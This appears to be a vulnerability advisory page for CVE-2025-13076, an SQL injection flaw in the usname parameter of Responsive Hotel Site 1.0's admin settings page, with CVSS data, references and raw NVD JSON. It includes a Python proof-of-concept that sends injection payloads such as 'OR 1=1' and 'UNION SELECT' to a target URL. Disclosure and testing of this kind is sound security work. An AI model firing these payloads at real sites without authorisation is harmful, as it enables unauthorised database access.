CVE-2025-13076

Description

A flaw has been found in code-projects Responsive Hotel Site 1.0. The affected element is an unknown function of the file /admin/usersetting.php. Executing manipulation of the argument usname can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:responsive_hotel_site:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Responsive Hotel Site 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13076 SQL Injection PoC
# Target: code-projects Responsive Hotel Site 1.0
# File: /admin/usersetting.php
# Parameter: usname

def exploit_sqli(target_url, payload):
    """Exploit SQL injection in usname parameter"""
    target = target_url.rstrip('/') + '/admin/usersetting.php'
    
    # SQL injection payload for testing
    # Basic test payload to trigger SQL error
    data = {
        'usname': payload
    }
    
    try:
        response = requests.post(target, data=data, timeout=10)
        print(f'[+] Request sent to: {target}')
        print(f'[+] Payload: {payload}')
        print(f'[+] Status Code: {response.status_code}')
        
        # Check for SQL error indicators
        if 'sql' in response.text.lower() or 'mysql' in response.text.lower() or 'syntax' in response.text.lower():
            print('[+] SQL error detected - vulnerability confirmed')
            return True
        return False
    except requests.exceptions.RequestException as e:
        print(f'[-] Error: {e}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-13076_poc.py <target_url>')
        sys.exit(1)
    
    target_url = sys.argv[1]
    
    # Test payloads
    payloads = [
        "'",  # Single quote to trigger SQL error
        "admin' OR '1'='1",  # Basic SQL injection test
        "admin' UNION SELECT 1,2,3---",  # UNION-based injection test
    ]
    
    print('[+] CVE-2025-13076 SQL Injection PoC')
    print('[+] Target: Responsive Hotel Site 1.0')
    print('='*50)
    
    for payload in payloads:
        exploit_sqli(target_url, payload)
        print('-'*50)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13076
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13076
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13076/
[4] VulDB https://vuldb.com/cve/CVE-2025-13076
[5] https://code-projects.org/
[6] https://github.com/zhizi1234/cve/blob/main/tmp70/report.md
[7] https://vuldb.com/?ctiid.332207
[8] https://vuldb.com/?id.332207
[9] https://vuldb.com/?submit.682867
[10] https://github.com/zhizi1234/cve/blob/main/tmp70/report.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13076", "sourceIdentifier": "[email protected]", "published": "2025-11-12T23:15:39.397", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in code-projects Responsive Hotel Site 1.0. The affected element is an unknown function of the file /admin/usersetting.php. Executing manipulation of the argument usname can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:responsive_hotel_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEEBA52B-991B-4FF9-AE6A-14E21F1F7E50"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/zhizi1234/cve/blob/main/tmp70/report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332207", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332207", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.682867", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/zhizi1234/cve/blob/main/tmp70/report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}